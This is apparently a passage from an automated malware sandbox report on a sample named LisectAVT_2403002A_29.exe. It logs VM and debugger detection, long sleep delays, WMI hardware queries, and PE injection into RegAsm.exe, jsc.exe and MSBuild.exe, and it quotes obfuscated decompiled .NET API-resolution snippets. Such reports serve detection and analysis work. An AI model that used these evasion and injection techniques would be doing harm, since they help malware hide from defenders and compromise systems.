Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -97080s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99436	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99324	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98987	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97997	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 96683	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99873
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99541
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99433
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99195
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 99094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 98094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97183
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 97075
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 96954
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 96767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 96641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 96516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 96391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 99083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98895
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 98094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97546
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 97109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96874
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96545
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 96108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 95890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 100000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 99014
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 98031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97722
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97455
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 97080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.19.dr	Binary or memory string: VMware
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.19.dr	Binary or memory string: VMware, Inc.
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.19.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.19.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.19.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: svchost.exe, 00000002.00000002.3405315224.00000298F0E5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.19.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.19.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.19.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.19.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 0000001A.00000002.3451198181.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.3452656866.0000000006110000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.19.dr	Binary or memory string: vmci.sys
Source: jsc.exe, 0000000F.00000002.3452363902.0000000006426000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.19.dr	Binary or memory string: vmci.syshbin`
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.19.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: svchost.exe, 00000002.00000002.3402453965.00000298EB82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: LisectAVT_2403002A_29.exe, 00000001.00000002.2292081850.0000021DA9170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Amcache.hve.19.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 0000000C.00000002.2545710265.0000000005F17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: Amcache.hve.19.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.19.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.19.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.19.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.19.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.19.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: svchost.exe, 0000001F.00000002.2542834623.00000191004DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.19.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.19.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.19.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.19.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\LisectAVT_2403002A_29.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: LisectAVT_2403002A_29.exe, ----.cs	Reference to suspicious API methods: (()Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FD4A_0655_061B_06D9_FBB9_FDE9_064D_060E_061D_0619._066D_066D_06D6_FDCC_060A_FD49_FBC8_FD43("\u061d\ufdea\ufd4c\ufbc4\ufbbd")), _FD4A_0655_061B_06D9_FBB9_FDE9_064D_060E_061D_0619._066D_066D_06D6_FDCC_060A_FD49_FBC8_FD43("\u06e8\ufdd8")), typeof()))(_FD3F_061A, _FDE2_FDEC_FBBC_FBD1, _FDD6_FDDC_FDE3_0670_060C_064F_0613_FDFE, out _0670)
Source: LisectAVT_2403002A_29.exe, ----.cs	Reference to suspicious API methods: (()Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibrary(_FD4A_0655_061B_06D9_FBB9_FDE9_064D_060E_061D_0619._066D_066D_06D6_FDCC_060A_FD49_FBC8_FD43("\u061d\ufdea\ufd4c\ufbc4\ufbbd")), _FD4A_0655_061B_06D9_FBB9_FDE9_064D_060E_061D_0619._066D_066D_06D6_FDCC_060A_FD49_FBC8_FD43("\u06e8\ufdd8")), typeof()))(_FD3F_061A, _FDE2_FDEC_FBBC_FBD1, _FDD6_FDDC_FDE3_0670_060C_064F_0613_FDFE, out _0670)
Source: 9.2.svchost.exe.1f244086ce8.1.raw.unpack, oZQpaCyO4.cs	Reference to suspicious API methods: sHbn6juxSv.OpenProcess(ZHKsyD.DuplicateHandle, bInheritHandle: true, (uint)gmSjiIkP2.ProcessID)

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8BA008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 43C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: 43E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe base: FAD008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
